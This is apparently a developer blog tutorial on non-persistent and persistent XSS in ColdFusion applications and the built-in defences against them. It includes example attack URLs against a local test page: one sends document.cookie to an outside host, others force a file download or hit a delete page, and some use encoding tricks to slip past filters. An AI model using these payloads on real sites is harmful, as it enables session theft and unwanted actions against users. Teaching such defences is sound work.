Web Security one most favorite topic of mine. Though I’m not an expert in Web Security, I thought to share my idea which I learned, so that it will help someone who starts with this topic.
Following are the most common security vulnerability we generally face for our web application.
Out of the above listed security vulnerability; XSS attack has a huge share of 84%. So, let’s start with XSS attack.
Non - Persistent XSS Attack:
In this type of attack the script is not going to be stored somewhere but the attacker passes the malicious script by URL or FROM submits to deface the website.
Question arises, attacker may see some error message if he/she will pass that script how it's going to affect real user or the application?
Suppose attacker able to pass the wrong URL to provide the wrong URL to user in email or by any other medium and a user clicks on that wrong url then the user may face following problem.
Let say we have a page called index.cfm and have following code:
<cfoutput>#url.name#</cfoutput>. Means it only displays the "name" parameter value which we pass in url scope.
All the below examples are tested in Firefox 26.0 browser.
Attacker can get the session cookie of user and can take access of his login.
Example: http://localhost:8500/xsstesting/index.cfm?name=<body onload="alert('Hi');document.location='http://www.google.com?cookie=' %2B document.cookie"></body>
Attacker can able to download some executable file into the user’s computer.
Example: http://localhost:8500/xsstesting/index.cfm?name=<body onload="document.location='https://docs.google.com/uc?export=download%26id=0B2GDR5_Jv000OW9pSEZhaGZhQ1k'"></body>
Here I am downloading one of my zip file so don't worry for now :)
Attacker can delete any resource from that user account.
Example: http://localhost:8500/xsstesting/index.cfm?name=<body onload="alert('Hi');document.location='http://localhost:8500/xsstesting/deleteResource.cfm'"></body>
Suppose there is a page called "deleteResource.cfm" which will delete a particular resource then attacker can delete that resource.
Similarly we can create similar kind of attack while submitting a form.
Let’s see how we can protect our self from such kind of attack.
1. Use the following setting in Application.cfc
this.scriptprotect = "all";
This will save us from basic XSS attack like. If someone wants to directly execute a script tag like: http://localhost:8500/xsstesting/index.cfm?name=<script type="text/javascript">alert('Hello');</script> then you will see in output as:
<InvalidTag type="text/javascript">alert('Hello');</script>
So, the script will never execute in browser but it cannot protect script like we passed in body tag or any anchor tag. When we enables script protect in Application.cfc then ColdFusion parses variables of a particular scope and if it finds any which may cause XSS threat it replaces that tag by “Invalid”. What are the script tags are protected by ColdFusion server you can find from:
\{CF-Directory}\cfusion\lib\neo-security.xml and search for CrossSiteScriptPatterns. If you want to add any additional tags there for protecting then you can also add there and you have to restart CF server after making the changes.
2. Use some secure data formatting function while displaying the data to user like below.
<cfoutput>#htmlEditFormat(url.name)#</cfoutput>
What are the other secure data formatting functions available?
Version
|
Context Of Use
|
Function
|
Example
|
CF 9
|
HTML Body
|
HTMLEditFormat
|
<cfoutput>#HTMLEditFormat(url.name)#</cfoutput>
|
CF9
|
URL String
|
URLEncodedFormat
|
<a href="./dispUserList?name=#URLEncodedFormat(url.name)#">User List</a>
|
CF10
|
HTML Body
|
EncodeForHTML
|
<cfoutput>#EncodeForHTML(url.name)#</cfoutput>
|
CF10
|
HTML Attribute
|
EncodeForHTMLAttribute
|
<div class="#EncodeForHTMLAttribute(url.name)#">...</div>
|
CF10
|
JavaScript
|
EncodeForJavascript
|
<script>var name = "#EncodeForJavascript(url.name)#";</script>
|
CF10
|
CSS
|
EncodeForCSS
|
<style>body{background-color:#encodeForCSS(url.color)#;}</style>
|
CF10
|
URL
|
EncodeForURL
|
<a href="./dispUserList?name=#EncodeForURL(url.name)#">User List</a>
|
We have already applied some security measure. So, you think you are safe now. N0!!!
Why? Here in the above example in most of the cases we have passed the script as plain text, so the different secure displaying functions are able to convert that string into a display safe string and displaying it. If someone passes the string in different encoding format available which supports by most of the browsers.
Example:
There are many ways where we can represent our string if we are using UTF-8 encoding in our web page.
Let say in how many ways I can represent a string : "<script>"
<script> : <script>
<script>: %26lt;script%26gt;
Similarly we can replace all "script" by hex code and also we can use other encoding to form the string. So, our display formatting function will not be able to detect all these.
Question comes, what we will do now?
First decode the variable which we are getting by some user input and decode that to plain text format. Then pass that to display formatting function. See the below example.
I have added new function called "sanitizeScope" in Application.cfc. It will decode all variables in a particular scope if you pass that scope as a argument to that function. So, in onRequestStart() method I’m calling that function to decode all variables in URL scope and I can use the display formatting function safely in my browser.
In the above example I have used a new function "canonicalize", which is added in ColdFusion 10 and is used for decoding a string.
Till now we have covered basic non-persistent scope XSS attack and how to avoid it. Hope you have enjoyed it!!!
Persistent XSS
Attack
In previous section we just learned, what is non – persistent XSS
attack and how we can restrict it. Now, let’s starts with Persistent XSS
Attack. This type of attack is most dangerous for a application as it will
affect the application until and unless the malicious script is removed.
Persistent XSS Attack means the malicious script permanently
stored in our application. Let say in one blog post some attacker has added
malicious script in comment; when the blog post will be loaded then it will
load that script and attacker can able to perform whatever he wants to do with
your application.
Find the example here:
http://coldfusion-tip.blogspot.in/2013/12/examples-of-xss-attack.html
How we can prevent
such attack?
Use the method “sanitizeScope” which I just described in
previous section ( or you can directly use “canonicalize” for deciding any inputs entered by user) then
apply display formatting methods available in different versions of ColdFusion while displaying user inputs or while storing user inputs in database.
You can apply this process before saving the
data into database, so that each time you don’t have to use display formatting
function while displaying the data. But, sometimes developers prefer not to
change any user input while saving in database but to format the data while
displaying to user. It depends on personal preference.
We have covered all basic XSS attack prevention methods available in ColdFusion. In next of XSS attack we will see some advance concept.